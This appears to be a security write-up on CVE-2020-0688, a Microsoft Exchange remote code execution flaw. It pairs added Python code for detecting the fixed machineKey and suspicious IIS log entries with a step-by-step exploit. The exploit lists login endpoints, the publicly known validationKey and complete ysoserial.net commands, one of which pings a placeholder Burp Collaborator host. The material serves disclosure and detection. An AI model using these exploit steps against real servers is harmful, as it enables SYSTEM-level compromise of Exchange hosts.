[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)
Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server share the same validationKey and decryptionKey values in web.config. Thus, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs with SYSTEM privileges.
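Because the vulnerability is a configuration property rather than a code path, the quickest way for a defender to triage a server is to check whether its ECP web.config still carries the fixed, publicly known validationKey quoted in this write-up. The following is an added example (not code from the original write-up or from Microsoft) that parses a web.config document and reports whether the static key is present; the two sample configurations and the decryptionKey placeholder are constructed for the demonstration, and the HMACSHA256 "fixed" sample only illustrates a non-static machineKey, not the exact content Microsoft's update writes.

```python
# Added example (not from the original write-up): detect whether an Exchange
# web.config still carries the fixed, publicly known ASP.NET machineKey that
# CVE-2020-0688 relies on. The validationKey value below is the one quoted in
# the write-up; the decryptionKey in the sample is a constructed placeholder.
import xml.etree.ElementTree as ET

# Fixed validationKey shipped with every Exchange installation (from the write-up).
FIXED_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"


def find_machine_key(web_config_xml: str) -> dict:
    """Return the attributes of the first <machineKey> element, or {} if none."""
    root = ET.fromstring(web_config_xml)
    node = root.find(".//machineKey")
    return dict(node.attrib) if node is not None else {}


def uses_fixed_machine_key(web_config_xml: str) -> bool:
    """True if web.config pins the known static validationKey (vulnerable shape)."""
    attrs = find_machine_key(web_config_xml)
    key = attrs.get("validationKey", "")
    # "AutoGenerate,IsolateApps" or any per-installation key is not the static key.
    return key.upper() == FIXED_VALIDATION_KEY


# Constructed sample: a web.config fragment carrying the fixed key (vulnerable).
SAMPLE_VULNERABLE = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_NOT_FROM_WRITEUP"
                validation="SHA1" />
  </system.web>
</configuration>
"""

# Constructed sample: per-installation (auto-generated) keys, a non-static shape.
SAMPLE_FIXED = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" />
  </system.web>
</configuration>
"""

if __name__ == "__main__":
    for name, cfg in (("vulnerable", SAMPLE_VULNERABLE), ("fixed", SAMPLE_FIXED)):
        verdict = "static key present" if uses_fixed_machine_key(cfg) else "no static key"
        print(f"{name}: {verdict}")
```

In practice you would feed the function the contents of the ECP virtual directory's web.config; a match means the update that replaces the static key has not been applied to that server, and the only real remediation is applying Microsoft's security update, since the key is what makes the signed ViewState forgeable.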
Step 1: Visit one of the following endpoints to reach the authentication page
- http(s)://exchangeserver/owa
- http(s)://exchangeserver/owa/auth.owa
- http(s)://exchangeserver/owa/auth/logon.aspx
- http(s)://exchangeserver/ecp
- http(s)://exchangeserver/ecp/default.aspx
Step 2: Log in with any valid credentials (the user account's privileges do not matter), and obtain the ASP.NET_SessionId value from the HTTP response Set-Cookie header and the __VIEWSTATEGENERATOR value from the HTTP response body. For example:
- ASP.NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
- __VIEWSTATEGENERATOR: B97B4E27
- validationKey (Fixed): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
- validationalg (Fixed): SHA1
Step 3: Generate the payload (to check the vulnerability) with YSoSerial.net.
Note that if you have access to the victim Exchange server, you can use the following payload, which creates a text file named PoC.txt in the C:\ directory as the PoC.
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
However, if you cannot access the server, the following would be better.
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
Step 4: After step 3 we have a URL-encoded ViewState payload. Send a GET request to the endpoint below in the following format
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
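The request shape in step 4 is also the detection opportunity: a normal ASP.NET page posts its ViewState in the request body, so a GET to /ecp/default.aspx whose query string carries both __VIEWSTATEGENERATOR and __VIEWSTATE is worth alerting on in the IIS logs. The following is an added example (not part of the original write-up) that parses IIS W3C-format log lines using their #Fields header and flags rows matching that shape; the log excerpt, client address and user name are constructed, and the __VIEWSTATE value in it is a made-up placeholder rather than a real payload.

```python
# Added example (not from the original write-up): flag IIS W3C log entries that
# match the request shape described in step 4, a GET to /ecp/default.aspx whose
# query string carries both __VIEWSTATEGENERATOR and __VIEWSTATE. Legitimate
# ASP.NET pages send ViewState in a POST body, so a ViewState blob in a GET
# query string to ECP is a strong indicator. All log lines below are constructed.
from urllib.parse import parse_qs

TARGET_STEM = "/ecp/default.aspx"
REQUIRED_PARAMS = ("__VIEWSTATEGENERATOR", "__VIEWSTATE")


def parse_w3c(lines):
    """Yield one dict per data row, keyed by the most recent #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed row; skip rather than misalign columns
        yield dict(zip(fields, values))


def is_viewstate_in_query(row):
    """True when the row is a GET to the ECP page with ViewState in the query string."""
    if row.get("cs-method", "").upper() != "GET":
        return False
    if row.get("cs-uri-stem", "").lower() != TARGET_STEM:
        return False
    query = row.get("cs-uri-query", "-")
    if query == "-":  # IIS logs "-" when there is no query string
        return False
    params = parse_qs(query, keep_blank_values=True)
    return all(p in params for p in REQUIRED_PARAMS)


def flag_suspicious(lines):
    """Return (client_ip, username, 'date time') for each row matching the pattern."""
    return [
        (row.get("c-ip", "-"), row.get("cs-username", "-"), f"{row['date']} {row['time']}")
        for row in parse_w3c(lines)
        if is_viewstate_in_query(row)
    ]


# Constructed IIS log excerpt: two benign requests and one matching step 4.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2020-02-26 10:01:02 10.0.0.5 GET /owa/auth/logon.aspx url=https://exchangeserver/owa/ 443 - 203.0.113.10 200
2020-02-26 10:01:09 10.0.0.5 POST /ecp/default.aspx - 443 CORP\\jdoe 203.0.113.10 200
2020-02-26 10:02:15 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyCONSTRUCTEDBLOB 443 CORP\\jdoe 203.0.113.10 500
""".splitlines()

if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG):
        print("suspicious ECP ViewState GET:", hit)
```

The check keys on the request shape rather than on the status code, because a server that fails to deserialize the payload and one that executes it can both log a 500; the authenticated user name in the matching row tells you which (low-privileged) account was used, which is the pivot for the follow-up investigation.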
The original blog post is available here.